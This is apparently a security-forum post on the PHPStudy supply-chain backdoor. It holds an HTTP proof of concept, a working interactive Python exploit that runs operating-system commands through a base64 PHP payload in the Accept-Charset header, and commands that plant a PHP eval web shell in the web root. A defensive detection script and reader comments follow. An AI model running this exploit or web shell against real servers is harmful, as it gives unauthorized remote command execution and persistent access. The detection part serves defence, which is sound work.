poc:

```http
GET /?id=1 HTTP/1.1
Host: rhiq8003.ia.aqlab.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://rhiq8003.ia.aqlab.cn/
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
```
exp:

```python
# jussi
import base64
import re

import requests

print("\n========== Phpstudy Backdoor Exploit ============\n")


def os_shell(url, headers):
    try:
        r = requests.get(url=url, headers=headers, verify=False, timeout=20)
        # the payload wraps the command output between two "flag" markers
        res = re.findall("flag(.*?)flag", r.text, re.S)
        print("".join(res))
    except requests.RequestException:
        print("[ - ]=========== Failed! Timeout... ==========[ - ]\n")


def main():
    url = "http://rhiq8003.ia.aqlab.cn/"
    while True:
        cmd = input("> ")
        payload = "echo \"flag\";system(\"" + cmd + "\");echo \"flag\";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            # base64-encoded PHP that the backdoored build decodes and executes
            'accept-charset': payload,
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'close',
        }
        os_shell(url=url, headers=headers)


if __name__ == '__main__':
    main()
```
Commands typed at the `>` prompt of the script:

```shell
echo \"<?php phpinfo();?>\" > ..\WWW\qazwsx.php
echo \"<?php eval(@\$_POST['zkaqzkaq']);?>\" > ..\WWW\qazwsxedc.php
```
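As an added defender-side example (not part of the original post, and not PHPStudy's own code), the check below parses a raw HTTP request such as the PoC above and flags an `Accept-Charset` header whose value base64-decodes to PHP code, which is the channel the exploit above uses. The sample requests are constructed; the positive case reuses the header value from the PoC, while the other two show that a normal charset list and an unrelated eight-character value are not flagged.

```python
import base64
import binascii
import re

# Constructed sample requests (not captured traffic). "poc" carries the
# Accept-Charset value from the PoC above; the others are benign.
SAMPLE_REQUESTS = {
    "benign": (
        "GET / HTTP/1.1\r\n"
        "Host: example.test\r\n"
        "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\n"
        "Connection: close\r\n\r\n"
    ),
    "poc": (
        "GET /?id=1 HTTP/1.1\r\n"
        "Host: example.test\r\n"
        "accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\r\n"
        "Accept-Encoding: gzip,deflate\r\n"
        "Connection: close\r\n\r\n"
    ),
    "base64_alphabet_only": (
        "GET / HTTP/1.1\r\n"
        "Host: example.test\r\n"
        "Accept-Charset: iso88591\r\n\r\n"
    ),
}

# PHP code markers we look for after decoding: an open tag or a call to a
# command/code execution function.
PHP_CODE = re.compile(
    r"(?i)<\?php|\b(?:system|eval|exec|shell_exec|passthru|assert|popen|proc_open)\s*\("
)


def parse_headers(raw_request):
    """Split a raw HTTP/1.x request into a {lower-cased name: value} dict.

    The request line is dropped; parsing stops at the blank line before the body.
    """
    headers = {}
    lines = raw_request.split("\r\n") if "\r\n" in raw_request else raw_request.split("\n")
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def decode_base64_text(value):
    """Return the decoded text if value is strict base64 that decodes to printable
    UTF-8 text, otherwise None (a normal charset list contains '-' and ',' and fails)."""
    compact = value.replace(" ", "")
    if not compact or len(compact) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        text = base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def inspect_request(raw_request):
    """Flag a request whose Accept-Charset header base64-decodes to PHP code."""
    headers = parse_headers(raw_request)
    value = headers.get("accept-charset")
    if value is None:
        return {"suspicious": False, "reason": "no accept-charset header", "decoded": None}
    decoded = decode_base64_text(value)
    if decoded is None:
        return {"suspicious": False, "reason": "accept-charset is not base64 text", "decoded": None}
    if PHP_CODE.search(decoded):
        return {"suspicious": True, "reason": "accept-charset decodes to PHP code", "decoded": decoded}
    return {"suspicious": False, "reason": "base64 text without PHP code markers", "decoded": decoded}


if __name__ == "__main__":
    for name, request in SAMPLE_REQUESTS.items():
        print(name, inspect_request(request))
```

The same `inspect_request` can be run over requests reconstructed from a web-server or proxy log; the strict base64 check (alphabet, padding, length, `validate=True`, printable UTF-8) keeps ordinary charset lists from producing false positives, and the final decision rests on the decoded text containing PHP execution markers rather than on base64 alone.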
Username | Coins | Points | Time | Reason |
---|---|---|---|---|
Track-聂风 | 30.00 | 0 | 2021-10-09 14:02:52 | A post that will benefit me for life~~ |
Track-聂风
Posted 2021-10-9
The reason is that PHPstudy's official website was hacked at one point; the attackers then replaced the contents of the official download files and secretly planted a backdoor, and this went undiscovered for several years.
dienamer
Posted 2021-10-24
I don't quite understand this vulnerability. Was this packet captured from the lab target?